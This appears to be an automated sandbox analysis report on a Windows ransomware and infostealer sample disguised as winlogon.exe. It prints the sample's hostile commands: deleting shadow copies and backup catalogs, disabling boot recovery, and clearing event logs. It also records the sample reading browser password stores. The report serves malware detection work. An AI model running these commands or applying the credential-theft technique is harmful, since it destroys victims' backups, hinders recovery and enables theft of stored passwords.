Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64140 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, | 1_2_00D64140 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001D60 GetFileAttributesA,GetTempPathA,GetTempFileNameA,CopyFileA,CryptUnprotectData,HeapAlloc,LocalFree,HeapFree,DeleteFileA, | 2_2_10001D60 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100010C0 StrStrIW,lstrlenW,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,wsprintfA,wsprintfA,CryptDestroyHash,CryptReleaseContext, | 2_2_100010C0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001200 StrStrIW,lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,LocalFree, | 2_2_10001200 |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\cmd.exeWinSta0\Defaulto |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quieth |
Source: cmd.exe | Binary or memory string: ? c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: cmd.exe | Binary or memory string: ?c:\Windows\system32\vssadmin.exe delete shadows /all /quiettemn |
Source: cmd.exe | Binary or memory string: 9C:\Windows\system32\cmd.exe/cc:\Windows\system32\vssadmin.exedeleteshadows/all/quietESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\A(0 |
Source: vssadmin.exe | Binary or memory string: Lc:\Windows\system32\vssadmin.exedeleteshadows/all/quiet, |
Source: vssadmin.exe | Binary or memory string: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: vssadmin.exe | Binary or memory string: C:\Users\user\Desktop\c:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quietc:\Windows\system32\vssadmin.exe delete shadows /all /quietWinSta0\Default |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C: |
Source: vssadmin.exe | Binary or memory string: vssadmin Delete Shadows |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D: |
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: unknown | DNS traffic detected: queries for: 252.0.0.224.in-addr.arpa |
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3 |
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3s |
Source: yegus.exe | String found in binary or memory: http://certs.starfieldtech.com/repository/1402 |
Source: yegus.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q |
Source: yegus.exe | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0 |
Source: yegus.exe | String found in binary or memory: http://crl.thawte.com/ThawtePCA-G3.crl0 |
Source: yegus.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0= |
Source: yegus.exe | String found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$ |
Source: yegus.exe | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0? |
Source: yegus.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: yegus.exe | String found in binary or memory: http://ocsp.digicert.com0K |
Source: yegus.exe | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0: |
Source: yegus.exe | String found in binary or memory: http://ocsp.thawte.com0 |
Source: yegus.exe | String found in binary or memory: http://s.symcb.com/pca3-g5.crl0 |
Source: yegus.exe | String found in binary or memory: http://s.symcd.com0_ |
Source: yegus.exe | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0/ |
Source: yegus.exe | String found in binary or memory: http://t2.symcb.com0A |
Source: winlogon.exe, _wjg.exe.1.dr | String found in binary or memory: http://www.sysinternals.com |
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/cps0% |
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/rpa0 |
Source: yegus.exe | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps0) |
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps07 |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100114D0 LoadLibraryW,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc, | 3_2_100114D0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 2_2_10001FB0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 2_2_10001FB0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\logins.json |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe |
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: _usm.exe | Binary or memory string: bcdedit.exe |
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: cmd.exe | Binary or memory string: 'Abcdedit.exeV |
Source: cmd.exe | Binary or memory string: 'Cbcdedit.exe |
Source: cmd.exe | Binary or memory string: bcdedit.exe |
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe |
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit.exe*} |
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures B |
Source: cmd.exe | Binary or memory string: 1C:\Windows\system32\bcdedit.exe\??\C:\Windows\system32\bcdedit.exe |
Source: cmd.exe | Binary or memory string: >C:\Windows\system32\cmd.exe/cbcdedit.exe/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenablednoamFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\AppData\Local\TempTMP=C:\Users\HERBBL~1\AppData\Local\TempUSERDOMAIN=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BV |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exe |
Source: cmd.exe | Binary or memory string: InternalNamebcdedit.exe |
Source: cmd.exe | Binary or memory string: OriginalFilenamebcdedit.exej% |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktopbcdedit.exeB |
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe.0\7 |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit*B |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Windows\system32\cmd.exeWinSta0\Defaultf |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noa |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bC:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled nodWinSta0\Default=C:=C:\Users\user\Desktop=ExitCode=00000000=Z:=Z:\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x |
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd( |
Source: bcdedit.exe | Binary or memory string: @bcdedit.exe/set{default}bootstatuspolicyignoreallfailuresackburnLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C: |
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures WinSta0\Default |
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;## |
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\ |
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd( |
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\ |
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled noWinSta0\Defaulti |
Source: bcdedit.exe | Binary or memory string: hj4`=\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;## |
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath, | 1_2_00D643A0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B696 push ecx; ret | 1_2_00D6B6A9 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013348F6 push ecx; ret | 2_2_01334909 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083436 push ecx; ret | 2_2_10083449 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51CE6 push ecx; ret | 3_2_00C51CF9 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001966 push ecx; ret | 3_2_10001979 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00142CC5 push ecx; ret | 4_2_00142CD8 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW, | 1_2_00D75F8F |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW, | 2_2_01339A82 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA, | 2_2_10088620 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW, | 3_2_00C5850A |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA, | 3_2_10008EEC |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose, | 4_2_00141441 |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: winlogon.exe | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console |
Source: _wjg.exe.1.dr | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console |
Source: winlogon.exe | Static file information: File size 1861632 > 1048576 |
Source: winlogon.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x195c00 |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: winlogon.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: | Binary string: KERBEROS.pdb source: ucngw.exe |
Source: | Binary string: msv1_0.pdb source: ucngw.exe |
Source: | Binary string: lsasrv.pdb source: ucngw.exe |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: _wjg.exe.1.dr | Binary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServerSeTcbPrivilege"%s" %sNetIsServiceAccountnetapi32.dll_SA_{262E99C9-6160-4871-ACEC-4E61736B6F21}NT AUTHORITYNT SERVICECreateRestrictedTokenwinsta0Winlogondefaultwinsta0\winlogonwinsta0\defaultWow64DisableWow64FsRedirectionKernel32.dll%s.exefailed to readsecure: %d |
Source: _wjg.exe.1.dr | Binary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program. |
Source: classification engine | Classification label: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D62B90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle, | 1_2_00D62B90 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013335E0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle, | 2_2_013335E0 |
